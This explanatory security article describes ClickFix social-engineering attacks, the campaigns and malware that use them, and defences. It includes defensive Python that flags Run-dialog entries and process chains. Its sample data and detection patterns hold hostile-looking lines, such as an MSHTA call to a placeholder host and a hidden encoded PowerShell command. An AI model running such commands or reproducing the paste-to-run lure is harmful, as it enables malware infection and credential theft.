What is a ClickFix attack and how does it work in detail?

Last updated: November 29, 2025
  • ClickFix is a social engineering technique that tricks the user into running malicious commands by copying scripts from fake error or verification pages.
  • It is used as an initial access vector in complex attack chains, distributing infostealers and RATs such as Lumma Stealer, NetSupport RAT, Latrodectus or ARECHCLIENT2.
  • The attacks rely on compromised websites, malvertising, fake CAPTCHAs, Google Meet / Zoom pages, and videos on social media, affecting both users and companies.
  • Defense combines EDR and advanced monitoring with extensive social engineering training, command restriction policies, and analysis of artifacts such as RunMRU and PowerShell logs.

ClickFix attacks have become one of the most fashionable social engineering tactics in the world of cybercrime: campaigns that look harmless, with fake browser warnings or security checks, but that end up getting the user to run malicious code on their own computer, almost without realizing it.

Far from being a technical curiosity, ClickFix has already been seen in real campaigns in Latin America, Europe and other regions, spreading infostealers, remote access trojans (RATs) and complex loaders such as GHOSTPULSE or NetSupport RAT, and even taking advantage of TikTok videos or YouTube tutorials to reach thousands of victims.

What exactly is a ClickFix attack?

ClickFix is a relatively recent social engineering technique (known since 2024) based on a very simple idea: convincing the user to copy and run commands on their own system to "fix" a supposed technical problem or complete a verification.

Instead of downloading a malicious program directly, the malicious website places a script or command on the clipboard (for example, PowerShell on Windows or MSHTA commands) and then shows step-by-step instructions so that the victim pastes and runs it in the console, the Run box, or a terminal.

This tactic exploits what many researchers call "verification fatigue": users are used to quickly clicking buttons such as "I am human", "Fix it" or "Update now" without analyzing the message much, which makes them highly vulnerable when the screen looks like a Cloudflare verification, a Google CAPTCHA, or a Google Meet or Zoom error.

The name ClickFix comes precisely from the buttons that usually appear in these lures, with text such as "Fix it", "How to fix", "Fix now" or "Solve the problem", which give the impression that the user is applying a quick fix, when in reality they are copying and launching a script that downloads malware.

How a ClickFix attack works step by step

Although there are many variants, almost all ClickFix attacks follow a common sequence that combines compromised websites, malicious JavaScript scripts, and "forced" user intervention to execute the code.

The first step is usually a visit to a legitimate website that has been compromised or to an outright malicious page, which the victim reaches through a link in a phishing email, poisoned search engine results (malicious SEO), malicious ads, or even a TikTok or YouTube video with tricks for activating paid software.

That page shows a fake warning or verification that imitates a technical problem: a document loading error, a failed browser update, microphone or camera problems in Google Meet/Zoom, or a supposed anti-bot check styled like Cloudflare or reCAPTCHA that prevents you from continuing unless something is "fixed".

As soon as the user clicks the "fix" button or ticks the "I am human" box, a JavaScript script automatically places a malicious command on the clipboard, usually a PowerShell or MSHTA command that will then download another piece of malware from a remote server.

The website displays a detailed guide so that the victim executes that command, for example:

  • Click the "Fix it" button to "copy the solution code".
  • Press Win+R to open the Run window in Windows.
  • Press Ctrl+V to paste the clipboard contents (the malicious command).
  • Press Enter to "fix the problem" or continue with the verification.

In more advanced variants, the trick is done with Win+X or with the browser console: the user is instructed to open a PowerShell terminal with administrator privileges from the quick access menu (Win+X), or to use the browser console (F12 or Ctrl+Shift+I) and paste a block of JavaScript code or a "verification" function there.

Once the command is executed, the whole infection unfolds in the background: the script downloads further components from command and control (C2) servers, decompresses files, runs malicious DLLs through side-loading, and ends by deploying infostealers or RATs in memory or on disk.

Why ClickFix is so hard to detect

One of the biggest advantages of ClickFix for attackers is that it bypasses many traditional security barriers, because the infection chain appears to start with the user themselves rather than with a downloaded file or a classic exploit.

There does not need to be a suspicious attachment or an executable downloaded directly by the browser. This means that many email filters, download blockers, and URL reputation checks see nothing malicious in the first stage.

The command is executed in a "trusted shell" of the system, such as PowerShell, cmd.exe, or the browser console. This gives the malware the appearance of legitimate activity and complicates the work of signature-based antivirus programs and other security solutions that are not strong at behavioral analysis.

Security products tend to detect the threat only after the payload has already executed, or on attempts to inject into protected processes, modify sensitive files such as the hosts file, establish persistence, or communicate with a C2 server; that is, in the post-exploitation stage.

By that time, the attacker may have gained significant access to the system: escalated privileges, credential theft, lateral movement across the corporate network, or even attempts to disable antivirus and other protection layers.

Where ClickFix is seen in action: common channels and tools

Research by various security labs has shown that ClickFix is used in a wide range of campaigns, aimed at both home users and companies in critical sectors.

Attackers usually rely on these channels to plant ClickFix lures:

  • Compromised legitimate websites, where they inject JavaScript frameworks such as ClearFake to display fake update or verification notices.
  • Malicious advertising (malvertising), especially banners and sponsored ads that redirect to fake software download or browser verification pages.
  • Tutorials and videos on YouTube or TikTok, with supposed tricks to activate software or unlock premium features for free.
  • Fake technical support forums and websites that imitate help portals, where running commands is "recommended" to fix system errors.

In Latin America, cases have already been documented in which legitimate and university websites were compromised. For example, the website of the School of Industrial Engineering at the Catholic University of Chile, or the website of the Police Housing Fund of Peru, which ended up showing ClickFix flows to their visitors.

US security agencies have warned of campaigns targeting users searching for games, PDF readers, Web3 browsers, or messaging apps, all by abusing everyday searches to redirect to pages that implement ClickFix.

Campaigns have also been seen that lean on Google Meet, Zoom, DocuSign, Okta, Facebook, or Cloudflare pages, where a browser error or CAPTCHA verification is shown, pushing the user to follow the sequence of copying and executing commands.

The most common malware distributed through ClickFix

ClickFix is rarely the only piece of the attack. It is usually the initial vector that enables the deployment of a multi-stage infection chain with several types of malware.

Among the most prominent families seen in recent campaigns:

  • Infostealers such as Vidar, Lumma, Stealc, Danabot, Atomic Stealer or Odyssey Stealer, specialized in stealing browser credentials, cookies, autofill data, cryptocurrency wallets, VPN and FTP credentials, and so on.
  • RATs (remote access trojans) such as NetSupport RAT or ARECHCLIENT2 (SectopRAT), which allow attackers to control the system, execute commands, exfiltrate information, and launch later stages, including ransomware.
  • Advanced loaders such as GHOSTPULSE, Latrodectus, or ClearFake, which act as the glue: downloading, decrypting and loading the next pieces into memory, often with elaborate layers of obfuscation and encryption.
  • Tools for stealing financial and business information, which extract data from forms, email clients, messaging, and business applications.

In campaigns active in 2024 and 2025, ClickFix has been seen feeding complex chains. For example, a ClickFix lure that launches PowerShell downloads a ZIP file containing a legitimate executable (such as Java's jp2launcher.exe) and a malicious DLL, and through side-loading ends up running NetSupport RAT on the computer.

Another common scenario is the use of MSHTA with obfuscated URLs on domains such as iploggerco, which imitate legitimate shortening or IP logging services; from there a Base64-encoded PowerShell script is downloaded that ends up dropping Lumma Stealer stagers or similar.

Real-world cases and documented campaigns using ClickFix

Reports from multiple incident response teams and security labs have identified many active campaigns that revolve around ClickFix as the entry point.

In the corporate sphere, notable impact has been seen in sectors such as high technology, financial services, manufacturing, retail and wholesale trade, public administration, professional and legal services, and energy and utilities, among many others.

In a May 2025 campaign, attackers used ClickFix to deliver NetSupport RAT through fake pages imitating DocuSign and Okta, taking advantage of infrastructure linked to the ClearFake framework to inject the JavaScript that manipulated the clipboard.

In March and April 2025, an increase in traffic to infrastructure controlled by the Latrodectus family was recorded, which began using ClickFix as its initial access method: a compromised portal redirected to a fake verification, the victim ran PowerShell from Win+R, and this downloaded an MSI that dropped the malicious DLL libcef.dll.

In parallel, typosquatting campaigns linked to Lumma Stealer have been identified. In these attacks, victims were asked to execute MSHTA commands pointing to domains that imitate iplogger; these commands downloaded heavily obfuscated PowerShell scripts that ended up unpacking executable packages such as PartyContinued.exe and CAB content (Boat.pst) to set up an AutoIt scripting engine responsible for launching the final Lumma build.

Elastic Security Labs has also described campaigns in which ClickFix acts as the first link for GHOSTPULSE, which in turn loads an intermediate .NET loader and finally injects ARECHCLIENT2 into memory, bypassing mechanisms such as AMSI through hooking and advanced obfuscation.

On the end-user side, many vendors have shown simplified examples of ClickFix attacks in which a "browser update" page or a fake CAPTCHA silently copies a script to the clipboard and then pushes the user to paste it into PowerShell with administrator privileges, which facilitates the connection to C2 infrastructure and the download of a program that modifies the system.

Another very worrying development is the arrival of ClickFix on TikTok. AI-generated videos promote "easy methods" to activate free paid versions of Office, Spotify Premium or editing programs, but in reality they lead users to copy and paste malicious commands that install infostealers such as Vidar or Stealc.

How analysts detect a ClickFix infection

Although it may seem like black magic to the user, a ClickFix infection leaves a technical trail that threat hunting teams and EDRs can use to detect the incident.

In Windows environments, one of the points of analysis is the RunMRU registry key, which stores the most recent commands executed from the Run window (Win+R):

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Analysts review these entries looking for suspicious patterns: obfuscated commands, use of PowerShell or MSHTA with unusual URLs, calls to unknown domains, or references to administrative tools that a typical user would not use.
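
The review described above can be automated. The following Python is an added example, not code from the original article: it checks an exported set of RunMRU values against the patterns just listed. The function name, the rule set and the sample values (placeholder domain, harmless Base64) are assumptions constructed for illustration.

```python
import re

# Heuristics for the patterns listed above: obfuscated or hidden commands,
# PowerShell/MSHTA with URLs, and admin tools an ordinary user rarely runs.
# The rule set is an assumption made for this example, not a complete list.
RULES = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|certutil|rundll32)(\.exe)?\b", re.I),
    "url": re.compile(r"https?://[^\s'\"]+", re.I),
    "hidden_window": re.compile(r"(?<!\S)-w(in(dowstyle)?)?\s+(hidden|h|1)\b", re.I),
    "encoded_command": re.compile(r"(?<!\S)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
}


def triage_runmru(values):
    """Return suspicious Run-dialog entries, most recent first.

    `values` maps RunMRU value names to their data, as exported from the key.
    MRUList holds the value names in most-recent-first order, and each
    command string is stored with a trailing "\\1" marker.
    """
    findings = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        command = raw[:-2] if raw.endswith("\\1") else raw
        hits = sorted(label for label, rx in RULES.items() if rx.search(command))
        # A script host on its own is normal admin use; require a second indicator.
        if "script_host" in hits and len(hits) >= 2:
            findings.append({"value": name, "command": command, "indicators": hits})
    return findings


# Constructed sample export: placeholder domain, and Base64 that decodes to
# the UTF-16 text "ABCDEFGHIJKL". These are not real indicators.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "mshta https://cdn.example.invalid/verify\\1",
    "d": "powershell -w hidden -enc QQBCAEMARABFAEYARwBIAEkASgBLAEwA\\1",
}

if __name__ == "__main__":
    for finding in triage_runmru(SAMPLE_RUNMRU):
        print(finding["value"], finding["indicators"], finding["command"])
```

RunMRU lives under HKEY_CURRENT_USER, so it has to be collected separately for each user profile on the machine.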

When attackers use the Win+X variant (quick access menu) to launch PowerShell or Command Prompt, the trail is found in process telemetry: process creation events (such as ID 4688 in the Windows Security log) in which explorer.exe spawns powershell.exe right after Win+X is pressed.

Correlation with other events, such as access to the %LocalAppData%\Microsoft\Windows\WinX\ folder or suspicious network connections after execution, helps outline the typical behavior of a ClickFix infection, especially if processes such as certutil.exe, mshta.exe, or rundll32.exe appear immediately afterwards.
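
As an added example (not from the original article), the correlation described above can be expressed over process-creation records: explorer.exe starts a shell, and that shell starts certutil.exe, mshta.exe or rundll32.exe shortly afterwards. Field names follow Event ID 4688; the `TimeCreated` and `Computer` keys, the 120-second window and the sample events are constructed assumptions.

```python
from datetime import datetime, timedelta
from ntpath import basename  # parses Windows paths on any OS

SHELLS = {"powershell.exe", "cmd.exe"}
FOLLOW_UPS = {"certutil.exe", "mshta.exe", "rundll32.exe"}


def _name(path):
    return basename(path).lower()


def find_clickfix_chains(events, window=timedelta(seconds=120)):
    """Return explorer.exe -> shell -> follow-up tool chains seen within `window`."""
    events = sorted(events, key=lambda e: e["TimeCreated"])
    chains = []
    for shell in events:
        if _name(shell["NewProcessName"]) not in SHELLS:
            continue
        if _name(shell["ParentProcessName"]) != "explorer.exe":
            continue
        follow_ups = [
            _name(e["NewProcessName"])
            for e in events
            # ProcessId in 4688 is the creator's PID; match the host as well,
            # because PIDs are only unique per machine.
            if e["Computer"] == shell["Computer"]
            and e["ProcessId"] == shell["NewProcessId"]
            and _name(e["NewProcessName"]) in FOLLOW_UPS
            and timedelta(0) <= e["TimeCreated"] - shell["TimeCreated"] <= window
        ]
        if follow_ups:
            chains.append({"host": shell["Computer"],
                           "shell_pid": shell["NewProcessId"],
                           "shell": _name(shell["NewProcessName"]),
                           "follow_ups": follow_ups})
    return chains


def _ev(ts, host, pid, new, creator_pid, parent):
    return {"TimeCreated": datetime.fromisoformat(ts), "Computer": host,
            "NewProcessId": pid, "NewProcessName": new,
            "ProcessId": creator_pid, "ParentProcessName": parent}


EXPLORER = r"C:\Windows\explorer.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = "C:\\Windows\\System32\\"

# Constructed sample events, not taken from a real incident.
SAMPLE_EVENTS = [
    _ev("2025-01-10T09:00:00", "WS01", 4100, PS, 2000, EXPLORER),  # shell with no follow-up
    _ev("2025-01-10T10:00:00", "WS01", 6700, PS, 2000, EXPLORER),
    _ev("2025-01-10T10:00:07", "WS01", 6712, SYS32 + "mshta.exe", 6700, PS),
    _ev("2025-01-10T10:00:20", "WS01", 6730, SYS32 + "rundll32.exe", 6700, PS),
    _ev("2025-01-10T12:00:00", "WS02", 5200, SYS32 + "cmd.exe", 1800, EXPLORER),
    # Ten minutes later: outside the default window, so not reported.
    _ev("2025-01-10T12:10:00", "WS02", 5260, SYS32 + "certutil.exe", 5200, SYS32 + "cmd.exe"),
]

if __name__ == "__main__":
    for chain in find_clickfix_chains(SAMPLE_EVENTS):
        print(chain)
```

Event 4688 is only written when process-creation auditing is enabled, so an empty result on a host without that policy says nothing about whether the chain occurred.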

Another detection vector is abuse of the clipboard. Advanced URL filtering and DNS security solutions can identify JavaScript that tries to insert malicious commands into the clipboard buffer, acting to block the page before the user completes the sequence.

What are attackers trying to achieve with the ClickFix technique?

Behind all this social engineering there is a clear goal: to profit financially from stolen information, from both users and organizations.

The infostealers deployed through ClickFix are designed to collect credentials, cookies, and sensitive data stored in browsers, email clients, corporate applications or cryptocurrency wallets, as well as internal documents and financial details.

With that material, malicious actors can carry out many criminal activities:

  • Extorting companies by threatening to leak confidential information about the organization or its customers.
  • Committing direct financial fraud using compromised bank accounts, online payment systems, or crypto wallets.
  • Impersonating the company or its employees to commit fraud against third parties, such as classic CEO fraud or BEC attacks.
  • Selling credentials and data packages on the dark web, to be used by other criminal groups in future attacks.
  • Conducting industrial or geopolitical espionage when the target is a specific organization or strategic sector.

In many documented campaigns, ClickFix has been the first step toward a larger attack, including ransomware deployment after credential theft, long-term access to corporate networks, or the use of compromised infrastructure as a base for other objectives.

How can users and companies protect themselves from ClickFix?

Defending against ClickFix combines technology, best practices, and a lot of awareness, because the weak link the technique exploits is user behavior.

At the individual level, there are several very simple golden rules that greatly reduce the risk of falling for it:

  • Never paste code into a console (PowerShell, cmd, terminal, browser console) just because a website asks you to, even if it looks legitimate.
  • Be wary of Cloudflare verifications, CAPTCHAs, or "browser update" pages that ask for unusual steps beyond clicking a box or button.
  • Keep your browser, operating system, and applications up to date, installing patches from official sources and not from unusual banners or pop-ups.
  • Turn on two-factor authentication (2FA) for important accounts, to make life harder for attackers even if they manage to steal a password.

In the corporate setting, in addition to these tips, companies need to go a step further and address ClickFix as a specific threat within their security strategy.

Some key measures for organizations are:

  • Restrict the use of command execution tools (PowerShell, cmd, MSHTA) through group policies, application control lists or EDR settings, so that only technical profiles use them and their activity is always logged.
  • Use modern antimalware and EDR solutions with behavior-based detection capabilities, able to identify suspicious execution patterns even when the user is involved.
  • Monitor network traffic and outbound connections to domains with a poor reputation, especially URL shortening services, newly registered domains, or unusual TLDs.
  • Regularly review artifacts such as RunMRU, PowerShell logs, and security events to look for signs of abuse of Win+R, Win+X or administrative consoles.

A key pillar is continuous, realistic staff training. A theory course is not enough; it is useful to run controlled social engineering tests that simulate ClickFix-style campaigns, CEO fraud, advanced phishing, or malvertising.

These simulations make it possible to measure the workforce's level of maturity with regard to these techniques, adjust the awareness plan, identify the highest-risk areas, and reinforce a "stop and think" culture before following suspicious instructions on a website or in an email.

Beyond that, it is important that companies are prepared to respond quickly to an incident: having clear response plans, specialized teams or providers, and well-defined processes and eradication procedures for when a possible ClickFix case or any other compromise vector is detected.

The spread of the ClickFix technique makes it clear that attackers have found an effective way to turn the user into an unwitting accomplice. And they do not hesitate to combine it with sophisticated malware, robust C2 infrastructure and large campaigns on social networks or search engines; understanding how it works, recognizing its signs and strengthening both technology and user education is what makes the difference today between suffering a major breach and cutting off the attack in time.
